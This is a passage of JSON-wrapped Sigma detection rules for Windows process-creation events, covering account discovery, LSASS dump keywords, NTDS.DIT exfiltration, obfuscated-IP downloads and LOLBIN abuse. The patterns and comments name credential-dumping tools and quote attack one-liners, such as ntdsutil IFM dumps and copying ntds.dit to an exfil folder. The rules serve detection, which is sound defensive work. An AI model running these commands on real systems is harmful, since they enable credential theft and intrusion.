    "content": "title: Local Accounts Discovery\nid: 502b42de-4306-40b4-9596-6f590c81f073\nstatus: test\nrelated:\n    - id: e28a5a99-da44-436d-b7a0-2afc20a5f413 # Whoami Utility Execution\n      type: obsolete\ndescription: Local accounts, System Owner/User discovery using operating systems utilities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-21\nmodified: 2025-10-20\ntags:\n    - attack.discovery\n    - attack.t1033\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_other_img:\n        - Image|endswith:\n              - '\\whoami.exe'\n              - '\\quser.exe'\n              - '\\qwinsta.exe'\n        - OriginalFileName:\n              - 'whoami.exe'\n              - 'quser.exe'\n              - 'qwinsta.exe'\n    selection_other_wmi:\n        Image|endswith: '\\wmic.exe'\n        CommandLine|contains|all:\n            - 'useraccount'\n            - 'get'\n    selection_other_cmdkey:\n        Image|endswith: '\\cmdkey.exe'\n        CommandLine|contains: ' /l'\n    selection_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - ' /c'\n            - 'dir '\n            - '\\Users\\'\n    filter_cmd:\n        CommandLine|contains: ' rmdir ' # don't match on 'dir'   \"C:\\Windows\\System32\\cmd.exe\" /q /c rmdir /s /q \"C:\\Users\\XX\\AppData\\Local\\Microsoft\\OneDrive\\19.232.1124.0005\"\n    selection_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: 'user'\n    filter_net:\n        CommandLine|contains:\n            - '/domain'       # local account discovery only\n            - '/add'          # discovery only\n            - '/delete'       # discovery only\n            - '/active'       # discovery only\n            - '/expires'      # discovery only\n            - '/passwordreq'  # discovery only\n            - '/scriptpath'   # discovery only\n            - '/times'        # discovery only\n            - '/workstations' # discovery only\n    condition: (selection_cmd and not filter_cmd) or (selection_net and not filter_net) or 1 of selection_other_*\nfalsepositives:\n    - Legitimate administrator or user enumerates local users for legitimate reason\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml",
    "content": "title: LOLBIN Execution From Abnormal Drive\nid: d4ca7c59-e9e4-42d8-bf57-91a776efcb87\nrelated:\n    - id: 5b80cf53-3a46-4adc-960b-05ec19348d74\n      type: similar\nstatus: test\ndescription: Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\n    - https://www.scythe.io/library/threat-emulation-qakbot\n    - https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman\ndate: 2022-01-25\nmodified: 2023-08-29\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: add more lolbins for additional coverage\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\certutil.exe'\n              - '\\cmstp.exe'\n              - '\\cscript.exe'\n              - '\\installutil.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'CALC.EXE'\n              - 'CertUtil.exe'\n              - 'CMSTP.EXE'\n              - 'cscript.exe'\n              - 'installutil.exe'\n              - 'MSHTA.EXE'\n              - 'REGSVR32.EXE'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    filter_main_currentdirectory:\n        CurrentDirectory|contains: 'C:\\'\n    filter_main_empty:\n        CurrentDirectory: ''\n    filter_main_null:\n        CurrentDirectory: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Rare false positives could occur on servers with multiple drives.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml",
    "content": "title: LSASS Dump Keyword In CommandLine\nid: ffa6861c-4461-4f59-8a41-578c39f3f23e\nrelated:\n    - id: a5a2d357-1ab8-4675-a967-ef9990a59391\n      type: derived\nstatus: test\ndescription: |\n    Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.\nreferences:\n    - https://github.com/Hackndo/lsassy\n    - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml\n    - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/\n    - https://github.com/helpsystems/nanodump\n    - https://github.com/CCob/MirrorDump\nauthor: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-24\nmodified: 2023-08-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains:\n              - 'lsass.dmp'\n              - 'lsass.zip'\n              - 'lsass.rar'\n              - 'Andrew.dmp'\n              - 'Coredump.dmp'\n              - 'NotLSASS.zip'  # https://github.com/CCob/MirrorDump\n              - 'lsass_2'  # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp\n              - 'lsassdump'\n              - 'lsassdmp'\n        - CommandLine|contains|all:\n              - 'lsass'\n              - '.dmp'\n        - CommandLine|contains|all:\n              - 'SQLDmpr'\n              - '.mdmp'\n        - CommandLine|contains|all:\n              - 'nanodump'\n              - '.dmp'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml",
    "content": "title: Potential File Download Via MS-AppInstaller Protocol Handler\nid: 180c7c5c-d64b-4a63-86e9-68910451bc8b\nrelated:\n    - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a\n      type: derived\nstatus: test\ndescription: |\n    Detects usage of the \"ms-appinstaller\" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE\n    The downloaded files are temporarly stored in \":\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\<RANDOM-8-CHAR-DIRECTORY>\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'ms-appinstaller://?source='\n            - 'http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_network_command.yml",
    "content": "title: Suspicious Network Command\nid: a29c1813-ab1f-4dde-b489-330b952e91ae\nstatus: test\ndescription: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows\nauthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2021-12-07\nmodified: 2025-10-19\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|re:\n            - 'ipconfig\\s+/all'\n            - 'netsh\\s+interface show interface'\n            - 'arp\\s+-a'\n            - 'nbtstat\\s+-n'\n            - 'net\\s+config'\n            - 'route\\s+print'\n    condition: selection\nfalsepositives:\n    - Administrator, hotline ask to user\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml",
    "content": "title: Suspicious Scan Loop Network\nid: f8ad2e2c-40b6-4117-84d7-20b89896ab23\nstatus: test\ndescription: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\n    - https://ss64.com/nt/for.html\n    - https://ss64.com/ps/foreach-object.html\nauthor: frack113\ndate: 2022-03-12\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_loop:\n        CommandLine|contains:\n            - 'for '\n            - 'foreach '\n    selection_tools:\n        CommandLine|contains:\n            - 'nslookup'\n            - 'ping'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml",
    "content": "title: Potential Network Sniffing Activity Using Network Tools\nid: ba1f7802-adc7-48b4-9ecb-81e227fddfd5\nstatus: test\ndescription: |\n    Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\n    Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\n    An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md\nauthor: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-21\nmodified: 2023-02-20\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tshark:\n        Image|endswith: '\\tshark.exe'\n        CommandLine|contains: '-i'\n    selection_windump:\n        Image|endswith: '\\windump.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activity to troubleshoot network issues\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_no_image_name.yml",
    "content": "title: Process Launched Without Image Name\nid: f208d6d8-d83a-4c2c-960d-877c37da84e5\nstatus: test\ndescription: Detect the use of processes with no name (\".exe\"), which can be used to evade Image-based detections.\nreferences:\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\.exe'\n    condition: selection\nfalsepositives:\n    - Rare legitimate software.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml",
    "content": "title: Execution of Suspicious File Type Extension\nid: c09dad97-1c78-4f71-b127-7edb2b8e491a\nstatus: test\ndescription: |\n    Detects whether the image specified in a process creation event doesn't refer to an \".exe\" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.\n    This rule might require some initial baselining to align with some third party tooling in the user environment.\nreferences:\n    - https://pentestlaboratories.com/2021/12/08/process-ghosting/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-12-09\nmodified: 2023-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    known_image_extension:\n        Image|endswith:\n            - '.bin'\n            - '.cgi'\n            - '.com'\n            - '.exe'\n            - '.scr'\n            - '.tmp' # sadly many installers use this extension\n    filter_main_image: # Windows utilities without extension\n        Image:\n            - 'System'\n            - 'Registry'\n            - 'MemCompression'\n            - 'vmmem'\n    filter_main_msi_installers:\n        Image|contains: ':\\Windows\\Installer\\MSI'\n    filter_main_driver_store:\n        Image|contains: ':\\Windows\\System32\\DriverStore\\FileRepository\\'\n    filter_main_msi_rollbackfiles:\n        Image|contains: ':\\Config.Msi\\'\n        Image|endswith:\n            - '.rbf'\n            - '.rbs'\n    filter_main_windows_temp:\n        - ParentImage|contains: ':\\Windows\\Temp\\'\n        - Image|contains: ':\\Windows\\Temp\\'\n    filter_main_deleted:\n        Image|contains: ':\\$Extend\\$Deleted\\'\n    filter_main_empty:\n        Image:\n            - '-'\n            - ''\n    filter_main_null:\n        Image: null\n    filter_optional_avira:\n        ParentImage|contains: ':\\ProgramData\\Avira\\'\n    filter_optional_nvidia:\n        Image|contains: 'NVIDIA\\NvBackend\\'\n        Image|endswith: '.dat'\n    filter_optional_winpakpro:\n        Image|contains:\n            - ':\\Program Files (x86)\\WINPAKPRO\\'\n            - ':\\Program Files\\WINPAKPRO\\'\n        Image|endswith: '.ngn'\n    filter_optional_myq_server:\n        Image|endswith:\n            - ':\\Program Files (x86)\\MyQ\\Server\\pcltool.dll'\n            - ':\\Program Files\\MyQ\\Server\\pcltool.dll'\n    filter_optional_wsl:\n        Image|contains|all:\n            - '\\AppData\\Local\\Packages\\'\n            - '\\LocalState\\rootfs\\'\n    filter_optional_lzma_exe:\n        Image|endswith: '\\LZMA_EXE'\n    filter_optional_firefox:\n        Image|contains: ':\\Program Files\\Mozilla Firefox\\'\n    filter_optional_docker:\n        ParentImage: 'C:\\Windows\\System32\\services.exe'\n        Image|endswith: 'com.docker.service'\n    condition: not known_image_extension and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml",
    "content": "title: Non-privileged Usage of Reg or Powershell\nid: 8f02c935-effe-45b3-8fc9-ef8696a9e41d\nstatus: test\ndescription: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg\nauthor: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community\ndate: 2020-10-05\nmodified: 2024-12-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'reg '\n              - 'add'\n        - CommandLine|contains:\n              - 'powershell'\n              - 'set-itemproperty'\n              - ' sp '\n              - 'new-itemproperty'\n    selection_data:\n        IntegrityLevel:\n            - 'Medium'\n            - 'S-1-16-8192'\n        CommandLine|contains|all:\n            - 'ControlSet'\n            - 'Services'\n        CommandLine|contains:\n            - 'ImagePath'\n            - 'FailureCommand'\n            - 'ServiceDLL'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntds.yml",
    "content": "title: Suspicious Process Patterns NTDS.DIT Exfil\nid: 8bc64091-6875-4881-aaf9-7bd25b5dda08\nstatus: test\ndescription: Detects suspicious process patterns used in NTDS.DIT exfiltration\nreferences:\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\n    - https://pentestlab.blog/tag/ntds-dit/\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1\n    - https://github.com/zcgonvh/NTDSDumpEx\n    - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1\n    - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-11\nmodified: 2022-11-10\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_tool:\n        # https://github.com/zcgonvh/NTDSDumpEx\n        - Image|endswith:\n              - '\\NTDSDump.exe'\n              - '\\NTDSDumpEx.exe'\n        - CommandLine|contains|all:\n              # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv\n              - 'ntds.dit'\n              - 'system.hiv'\n        - CommandLine|contains: 'NTDSgrab.ps1'\n    selection_oneliner_1:\n        # powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q\"\n        CommandLine|contains|all:\n            - 'ac i ntds'\n            - 'create full'\n    selection_onliner_2:\n        # cmd.exe /c copy z:\\windows\\ntds\\ntds.dit c:\\exfil\\ntds.dit\n        CommandLine|contains|all:\n            - '/c copy '\n            - '\\windows\\ntds\\ntds.dit'\n    selection_onliner_3:\n        # ntdsutil \"activate instance ntds\" \"ifm\" \"create full c:\\windows\\temp\\data\\\" \"quit\" \"quit\"\n        CommandLine|contains|all:\n            - 'activate instance ntds'\n            - 'create full'\n    selection_powershell:\n        CommandLine|contains|all:\n            - 'powershell'\n            - 'ntds.dit'\n    set1_selection_ntds_dit:\n        CommandLine|contains: 'ntds.dit'\n    set1_selection_image_folder:\n        - ParentImage|contains:\n              - '\\apache'\n              - '\\tomcat'\n              - '\\AppData\\'\n              - '\\Temp\\'\n              - '\\Public\\'\n              - '\\PerfLogs\\'\n        - Image|contains:\n              - '\\apache'\n              - '\\tomcat'\n              - '\\AppData\\'\n              - '\\Temp\\'\n              - '\\Public\\'\n              - '\\PerfLogs\\'\n    condition: 1 of selection* or all of set1*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml",
    "content": "title: Potentially Suspicious Call To Win32_NTEventlogFile Class\nid: caf201a9-c2ce-4a26-9c3a-2b9525413711\nrelated:\n    - id: e2812b49-bae0-4b21-b366-7c142eafcde2\n      type: similar\nstatus: test\ndescription: Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_class:\n        CommandLine|contains: 'Win32_NTEventlogFile'\n    selection_function:\n        CommandLine|contains:\n            - '.BackupEventlog('\n            - '.ChangeSecurityPermissions('\n            - '.ChangeSecurityPermissionsEx('\n            - '.ClearEventLog('\n            - '.Delete('\n            - '.DeleteEx('\n            - '.Rename('\n            - '.TakeOwnerShip('\n            - '.TakeOwnerShipEx('\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml",
    "content": "title: Use Short Name Path in Image\nid: a96970af-f126-420d-90e1-d37bf25e50e1\nrelated:\n    - id: 349d891d-fef0-4fe4-bc53-eee623a15969\n      type: similar\nstatus: test\ndescription: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/frack113/status/1555830623633375232\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-07\nmodified: 2025-10-20\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '~1\\'\n            - '~2\\'\n    filter_main_system_process:\n        ParentImage:\n            - 'C:\\Windows\\System32\\Dism.exe'\n            - 'C:\\Windows\\System32\\cleanmgr.exe'  # Spawns DismHost.exe with a shortened username (if too long)\n    filter_main_installers:\n        - Image|contains|all:\n              - '\\AppData\\'\n              - '\\Temp\\'\n        - Image|endswith:\n              - '~1\\unzip.exe'\n              - '~1\\7zG.exe'\n    filter_optional_webex:\n        ParentImage|endswith: '\\WebEx\\WebexHost.exe' # Spawns a shortened version of the CLI and Image processes\n    filter_optional_thor:\n        ParentImage|endswith: '\\thor\\thor64.exe'\n    filter_optional_installshield:\n        - Product: 'InstallShield (R)'\n        - Description: 'InstallShield (R) Setup Engine'\n        - Company: 'InstallShield Software Corporation'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml",
    "content": "title: Use NTFS Short Name in Command Line\nid: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795\nrelated:\n    - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b\n      type: similar\nstatus: test\ndescription: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/jonasLyk/status/1555914501802921984\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2022-09-21\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '~1.exe'\n            - '~1.bat'\n            - '~1.msi'\n            - '~1.vbe'\n            - '~1.vbs'\n            - '~1.dll'\n            - '~1.ps1'\n            - '~1.js'\n            - '~1.hta'\n            - '~2.exe'\n            - '~2.bat'\n            - '~2.msi'\n            - '~2.vbe'\n            - '~2.vbs'\n            - '~2.dll'\n            - '~2.ps1'\n            - '~2.js'\n            - '~2.hta'\n    filter:\n        - ParentImage|endswith:\n              - '\\WebEx\\WebexHost.exe'\n              - '\\thor\\thor64.exe'\n        - CommandLine|contains: 'C:\\xampp\\vcredist\\VCREDI~1.EXE'\n    condition: selection and not filter\nfalsepositives:\n    - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml",
    "content": "title: Use NTFS Short Name in Image\nid: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b\nrelated:\n    - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795\n      type: similar\nstatus: test\ndescription: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/jonasLyk/status/1555914501802921984\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-06\nmodified: 2023-07-20\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '~1.bat'\n            - '~1.dll'\n            - '~1.exe'\n            - '~1.hta'\n            - '~1.js'\n            - '~1.msi'\n            - '~1.ps1'\n            - '~1.tmp'\n            - '~1.vbe'\n            - '~1.vbs'\n            - '~2.bat'\n            - '~2.dll'\n            - '~2.exe'\n            - '~2.hta'\n            - '~2.js'\n            - '~2.msi'\n            - '~2.ps1'\n            - '~2.tmp'\n            - '~2.vbe'\n            - '~2.vbs'\n    filter_main_generic_parent:\n        ParentImage: 'C:\\Windows\\explorer.exe'\n    filter_optional_webex:\n        ParentImage|endswith: '\\WebEx\\WebexHost.exe'\n    filter_optional_thor:\n        ParentImage|endswith: '\\thor\\thor64.exe'\n    filter_optional_winzip:\n        Image: 'C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE'\n    filter_optional_vcred:\n        Image|endswith: '\\VCREDI~1.EXE'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Software Installers\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml",
    "content": "title: Obfuscated IP Download Activity\nid: cb5a2333-56cf-4562-8fcb-22ba1bca728d\nstatus: test\ndescription: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command\nreferences:\n    - https://h.43z.one/ipconverter/\n    - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608\n    - https://twitter.com/fr0s7_/status/1712780207105404948\nauthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-08-03\nmodified: 2025-07-18\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_command:\n        CommandLine|contains:\n            - 'Invoke-WebRequest'\n            - 'iwr '\n            - 'Invoke-RestMethod'\n            - 'irm '\n            - 'wget '\n            - 'curl '\n            - 'DownloadFile'\n            - 'DownloadString'\n    selection_ip_1:\n        CommandLine|contains:\n            - ' 0x'\n            - '//0x'\n            - '.0x'\n            - '.00x'\n    selection_ip_2:\n        CommandLine|contains|all:\n            - 'http://%'\n            - '%2e'\n    selection_ip_3:\n        # http://81.4.31754\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}'\n        # http://81.293898\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.0[0-9]{3,7}'\n        # http://1359248394\n        - CommandLine|re: 'https?://0[0-9]{3,11}'\n        # http://0121.04.0174.012\n        - CommandLine|re: 'https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}'\n        # http://012101076012\n        - CommandLine|re: 'https?://0[0-9]{1,11}'\n        # For octal format\n        - CommandLine|re: ' [0-7]{7,13}'\n    filter_main_valid_ip:\n        CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}'\n    condition: selection_command and 1 of selection_ip_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml",
    "content": "title: Obfuscated IP Via CLI\nid: 56d19cb4-6414-4769-9644-1ed35ffbb148\nstatus: test\ndescription: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line\nreferences:\n    - https://h.43z.one/ipconverter/\n    - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-08-03\nmodified: 2023-11-06\ntags:\n    - attack.discovery\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\ping.exe'\n            - '\\arp.exe'\n    selection_ip_1:\n        CommandLine|contains:\n            - ' 0x'\n            - '//0x'\n            - '.0x'\n            - '.00x'\n    selection_ip_2:\n        CommandLine|contains|all:\n            - 'http://%'\n            - '%2e'\n    selection_ip_3:\n        # http://81.4.31754\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}'\n        # http://81.293898\n        - CommandLine|re: 'https?://[0-9]{1,3}\\.0[0-9]{3,7}'\n        # http://1359248394\n        - CommandLine|re: 'https?://0[0-9]{3,11}'\n        # http://0121.04.0174.012\n        - CommandLine|re: 'https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}'\n        # http://012101076012\n        - CommandLine|re: 'https?://0[0-9]{1,11}'\n        # For octal format\n        - CommandLine|re: ' [0-7]{7,13}'\n    filter_main_valid_ip:\n        CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}'\n    condition: selection_img and 1 of selection_ip_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_parents.yml",
    "content": "title: Suspicious Process Parents\nid: cbec226f-63d9-4eca-9f52-dfb6652f24df\nstatus: test\ndescription: Detects suspicious parent processes that should not have any children or should only have a single possible child program\nreferences:\n    - https://twitter.com/x86matthew/status/1505476263464607744?s=12\n    - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-21\nmodified: 2022-09-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\minesweeper.exe'\n            - '\\winver.exe'\n            - '\\bitsadmin.exe'\n    selection_special:\n        ParentImage|endswith:\n            - '\\csrss.exe'\n            - '\\certutil.exe'\n         # - '\\schtasks.exe'\n            - '\\eventvwr.exe'\n            - '\\calc.exe'\n            - '\\notepad.exe'\n    filter_special:\n        Image|endswith:\n            - '\\WerFault.exe'\n            - '\\wermgr.exe'\n            - '\\conhost.exe' # csrss.exe, certutil.exe\n            - '\\mmc.exe'     # eventvwr.exe\n            - '\\win32calc.exe' # calc.exe\n            - '\\notepad.exe'\n    filter_null:\n        Image: null\n    condition: selection or ( selection_special and not 1 of filter_* )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_powershell_execution_via_dll.yml",
